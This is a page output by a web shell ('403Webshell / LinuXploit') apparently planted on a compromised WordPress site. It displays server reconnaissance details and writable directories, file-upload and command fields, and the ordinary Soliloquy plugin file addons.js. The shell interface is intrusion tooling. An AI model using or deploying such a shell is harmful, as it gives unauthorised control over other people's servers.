403Webshell
Server IP : 104.21.74.147  /  Your IP : 216.73.217.154
Web Server : nginx/1.24.0
System : Linux wordpress-sites 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/rebeccaone.com/wp-content/plugins/soliloquy/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/rebeccaone.com/wp-content/plugins/soliloquy/assets/js//addons.js
/* eslint-disable @typescript-eslint/no-unused-vars */
/* global soliloquy_addons, ajaxurl */
/* exported e */
/*jshint unused:false*/
/* ==========================================================
 * settings.js
 * https://soliloquywp.com/
 * ==========================================================
 * Copyright 2014 Thomas Griffin.
 *
 * Licensed under the GPL License, Version 2.0 or later (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 * ========================================================== */
// jshint ignore:line
(function ($, window, document, soliloquy_addons) {
	//DOM Ready
	$(function () {
		//Create the Select boxes
		$('.soliloquy-chosen').each(function () {
			$(this).chosen({
				disable_search: true
			});
		});

		$(document).on('click', '.soliloquy-upgrade-modal', function () {
			$.alert({
				title: soliloquy_addons.thanks_for_interest,
				content: soliloquy_addons.upgrade_modal,
				icon: 'dashicons dashicons-info',
				type: 'blue',
				boxWidth: '550px',
				useBootstrap: false,
				theme: 'modern',
				titleClass: 'soliloquy-upgrade-modal-title',
				onOpen: function () {
					this.$jconfirmBox.addClass('soliloquy-upgrade-modal-box');
				},
				buttons: {
					confirm: {
						text: soliloquy_addons.ok,
						btnClass: 'btn-confirm',
						keys: ['enter']
					}
				}
			});
		});

		//Sort Filter for addons
		$('#soliloquy-addon-filter').on('change', function () {
			const $select = $(this),
				$value = $select.val(),
				$container = $('#soliloquy-addons-area'),
				container_data = $container.data('soliloquy-filter'),
				$addon = $('#soliloquy-addons-area .soliloquy-addon');

			//Make sure the addons are visible.
			$addon.show();

			switch ($value) {
				case 'asc':
					$addon
						.sort(function (a, b) {
							return $(a).data('addon-title').localeCompare($(b).data('addon-title'));
						})
						.each(function (_, addon) {
							$(addon).removeClass('last');

							$container.append(addon).hide().fadeIn(100);
						});

					$('#soliloquy-addons-area .soliloquy-addon:nth-child(3n)').addClass('last');

					break;
				case 'desc':
					$addon
						.sort(function (a, b) {
							return $(b).data('addon-title').localeCompare($(a).data('addon-title'));
						})
						.each(function (_, addon) {
							$(addon).removeClass('last');
							$container.append(addon).hide().fadeIn(100);
						});

					$('#soliloquy-addons-area .soliloquy-addon:nth-child(3n)').addClass('last');

					break;
				case 'active':
					$addon.hide().filter('[data-addon-status="active"]').show();

					$addon.removeClass('last');

					$('#soliloquy-addons-area .soliloquy-addon:visible').each(function (i) {
						if ((i + 1) % 3 === 0) {
							$(this).addClass('last');
						}
					});

					break;
				case 'inactive':
					$addon.hide().filter('[data-addon-status="inactive"]').show();
					$addon.removeClass('last');

					$('#soliloquy-addons-area .soliloquy-addon:visible').each(function (i) {
						if ((i + 1) % 3 === 0) {
							$(this).addClass('last');
						}
					});

					break;
				case 'installed':
					$addon.hide().filter('[data-addon-status="not_installed"]').show();
					$addon.removeClass('last');
					$('#soliloquy-addons-area .soliloquy-addon:visible').each(function (i) {
						if ((i + 1) % 3 === 0) {
							$(this).addClass('last');
						}
					});
					break;
			}
		});

		// Re-enable install button if user clicks on it, needs creds but tries to install another addon instead.
		$('#soliloquy-addons-area').on(
			'click.refreshInstallAddon',
			'.soliloquy-addon-action-button',
			function (e) {
				e.preventDefault();

				const $el = $(this),
					buttons = $('#soliloquy-addons-area').find('.soliloquy-addon-action-button');

				$.each(buttons, function (i, element) {
					if ($el === element) {
						return true;
					}

					soliloquyAddonRefresh(element);
				});
			}
		);

		// Process Addon activations for those currently installed but not yet active.
		$('#soliloquy-addons-area').on(
			'click.activateAddon',
			'.soliloquy-activate-addon',
			function (e) {
				e.preventDefault();

				const $button = $(this),
					plugin = $button.attr('rel'),
					$el = $button.parent().parent();

				// Remove any leftover error messages, output an icon and get the plugin basename that needs to be activated.
				$('.soliloquy-addon-error').remove();

				$button.text(soliloquy_addons.activating);

				// Process the Ajax to perform the activation.
				const opts = {
					url: ajaxurl,
					type: 'post',
					async: true,
					cache: false,
					dataType: 'json',
					data: {
						action: 'soliloquy_activate_addon',
						nonce: soliloquy_addons.activate_nonce,
						plugin: plugin
					},
					success: function (response) {
						// If there is a WP Error instance, output it here and quit the script.
						if (response && true !== response) {
							$el.slideDown('normal', function () {
								$(this).after(
									'<div class="soliloquy-addon-error"><strong>' + response.error + '</strong></div>'
								);
								$('.soliloquy-addon-error').delay(3000).slideUp();
							});
							return;
						}
						// The Ajax request was successful, so let's update the output.
						$button
							.text(soliloquy_addons.deactivate)
							.removeClass('soliloquy-activate-addon')
							.addClass('soliloquy-deactivate-addon');
						$el.removeClass('soliloquy-addon-inactive').addClass('soliloquy-addon-active');
					},
					error: function (xhr, textStatus, e) {
						return;
					}
				};
				$.ajax(opts);
			}
		);

		// Process Addon deactivations for those currently active.
		$('#soliloquy-addons-area').on(
			'click.deactivateAddon',
			'.soliloquy-deactivate-addon',
			function (e) {
				e.preventDefault();

				const $button = $(this),
					plugin = $button.attr('rel'),
					$el = $button.parent().parent();

				// Remove any leftover error messages, output an icon and get the plugin basename that needs to be activated.
				$('.soliloquy-addon-error').remove();

				$button.text(soliloquy_addons.deactivating);

				// Process the Ajax to perform the activation.
				const opts = {
					url: ajaxurl,
					type: 'post',
					async: true,
					cache: false,
					dataType: 'json',
					data: {
						action: 'soliloquy_deactivate_addon',
						nonce: soliloquy_addons.deactivate_nonce,
						plugin: plugin
					},
					success: function (response) {
						// If there is a WP Error instance, output it here and quit the script.
						if (response && true !== response) {
							$el.slideDown('normal', function () {
								$(this).after(
									'<div class="soliloquy-addon-error"><strong>' + response.error + '</strong></div>'
								);
								$('.soliloquy-addon-error').delay(3000).slideUp();
							});

							return;
						}

						// The Ajax request was successful, so let's update the output.
						$button
							.text(soliloquy_addons.activate)
							.removeClass('soliloquy-deactivate-addon')
							.addClass('soliloquy-activate-addon');
						$el.removeClass('soliloquy-addon-active').addClass('soliloquy-addon-inactive');
					},
					error: function (xhr, textStatus, e) {
						return;
					}
				};
				$.ajax(opts);
			}
		);

		// Process Addon installations.
		$('#soliloquy-addons-area').on('click.installAddon', '.soliloquy-install-addon', function (e) {
			e.preventDefault();

			const $button = $(this),
				plugin = $button.attr('rel'),
				$el = $button.parent().parent();

			// Remove any leftover error messages, output an icon and get the plugin basename that needs to be activated.
			$('.soliloquy-addon-error').remove();

			$button.text(soliloquy_addons.installing);

			// Process the Ajax to perform the activation.
			const opts = {
				url: ajaxurl,
				type: 'post',
				async: true,
				cache: false,
				dataType: 'json',
				data: {
					action: 'soliloquy_install_addon',
					nonce: soliloquy_addons.install_nonce,
					plugin: plugin
				},
				success: function (response) {
					// If there is a WP Error instance, output it here and quit the script.
					if (response.error) {
						$el.slideDown('normal', function () {
							$button
								.parent()
								.parent()
								.after(
									'<div class="soliloquy-addon-error"><strong>' + response.error + '</strong></div>'
								);
							$button.text(soliloquy_addons.install);
							$('.soliloquy-addon-error').delay(4000).slideUp();
						});
						return;
					}

					// If we need more credentials, output the form sent back to us.
					if (response.form) {
						// Display the form to gather the users credentials.
						$el.slideDown('normal', function () {
							$(this).after('<div class="soliloquy-addon-error">' + response.form + '</div>');
						});

						// Add a disabled attribute the install button if the creds are needed.
						$button.attr('disabled', true);

						$('#soliloquy-addons-area').on('click.installCredsAddon', '#upgrade', function (e) {
							// Prevent the default action, let the user know we are attempting to install again and go with it.
							e.preventDefault();
							$(this).val(soliloquy_addons.installing);

							// Now let's make another Ajax request once the user has submitted their credentials.
							const hostname = $(this).parent().parent().find('#hostname').val(),
								username = $(this).parent().parent().find('#username').val(),
								password = $(this).parent().parent().find('#password').val(),
								proceed = $(this),
								connect = $(this).parent().parent().parent().parent();
							const cred_opts = {
								url: ajaxurl,
								type: 'post',
								async: true,
								cache: false,
								dataType: 'json',
								data: {
									action: 'soliloquy_install_addon',
									nonce: soliloquy_addons.install_nonce,
									plugin: plugin,
									hostname: hostname,
									username: username,
									password: password
								},
								success: function (response) {
									// If there is a WP Error instance, output it here and quit the script.
									if (response.error) {
										$el.slideDown('normal', function () {
											$button
												.parent()
												.parent()
												.after(
													'<div class="soliloquy-addon-error"><strong>' +
														response.error +
														'</strong></div>'
												);
											$button.text(soliloquy_addons.install);
											$('.soliloquy-addon-error').delay(4000).slideUp();
										});

										return;
									}

									if (response.form) {
										$('.soliloquy-inline-error').remove();
										$(proceed).val(soliloquy_addons.proceed);
										$(proceed).after(
											'<span class="soliloquy-inline-error">' +
												soliloquy_addons.connect_error +
												'</span>'
										);
										return;
									}

									// The Ajax request was successful, so let's update the output.
									$(connect).remove();
									$button.show();
									$button
										.text(soliloquy_addons.activate)
										.removeClass('soliloquy-install-addon soliloquy-icon-cloud-download')
										.addClass('soliloquy-activate-addon soliloquy-icon-toggle-on');
									$button.attr('rel', response.plugin);
									$button.removeAttr('disabled');
									$el
										.removeClass('soliloquy-addon-not-installed')
										.addClass('soliloquy-addon-inactive');
								},
								error: function (xhr, textStatus, e) {
									return;
								}
							};
							$.ajax(cred_opts);
						});

						// No need to move further if we need to enter our creds.
						return;
					}

					// The Ajax request was successful, so let's update the output.
					$button
						.text(soliloquy_addons.activate)
						.removeClass('soliloquy-install-addon soliloquy-icon-cloud-download')
						.addClass('soliloquy-activate-addon soliloquy-icon-toggle-on');
					$button.attr('rel', response.plugin);
					$el.removeClass('soliloquy-addon-not-installed').addClass('soliloquy-addon-inactive');
				},

				error: function (xhr, textStatus, e) {
					return;
				}
			};
			$.ajax(opts);
		});

		// Function to clear any disabled buttons and extra text if the user needs to add creds but instead tries to install a different addon.
		function soliloquyAddonRefresh(element) {
			if ($(element).attr('disabled')) {
				$(element).removeAttr('disabled');
			}
			if ($(element).parent().parent().hasClass('soliloquy-addon-not-installed')) {
				$(element).text(soliloquy_addons.install);
			}
		}
	});
})(jQuery, window, document, soliloquy_addons);

Youez - 2016 - github.com/yon3zu
LinuXploit